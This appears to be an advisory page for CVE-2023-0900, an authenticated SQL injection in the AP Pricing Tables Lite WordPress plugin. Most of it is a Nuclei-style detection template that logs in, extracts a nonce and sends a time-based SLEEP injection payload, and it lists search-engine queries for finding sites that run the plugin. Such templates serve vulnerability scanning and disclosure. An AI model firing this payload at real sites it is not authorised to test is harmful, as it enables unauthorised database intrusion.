CVE-2023-0900: AP Pricing Tables Lite <= 1.1.6 - SQL Injection

日期: 2025-08-01 | 影响软件: AP Pricing Tables Lite | POC: 已公开

漏洞描述

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.

PoC代码[已公开]

id: CVE-2023-0900

info:
  name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
  reference:
    - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
    - https://github.com/WPPlugins/ap-pricing-tables-lite
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-0900
    cwe-id: CWE-89
    epss-score: 0.04407
    epss-percentile: 0.88581
    cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wpdevart
    product: pricing_table_builder
    framework: wordpress
    shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite
    fofa-query: body=wp-content/plugins/ap-pricing-tables-lite
    publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
  tags: time-based-sqli,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_3>=5'
          - 'status_code_3 == 200'
          - 'contains(body_3, "Security check")'
          - 'contains(body_2, "ap-pricing-tables-lite")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce=([0-9a-z]+)">Log Out'
        internal: true
# digest: 4b0a00483046022100f1fe241f9766c73a4376f04590c958c0558ff25a55c6ac88681e40522ffb19e0022100e7cafd3da7b6c55467573379e0d64958c8b3a33b539abdcd0a87c97aa977f92e:922c64590222798bb761d5b6d8e72950